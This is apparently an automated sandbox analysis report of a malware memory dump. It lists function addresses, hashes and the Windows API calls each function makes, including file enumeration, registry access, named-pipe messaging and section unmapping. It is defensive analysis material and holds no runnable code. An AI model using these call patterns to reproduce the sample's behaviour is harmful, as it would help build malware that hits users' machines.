  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
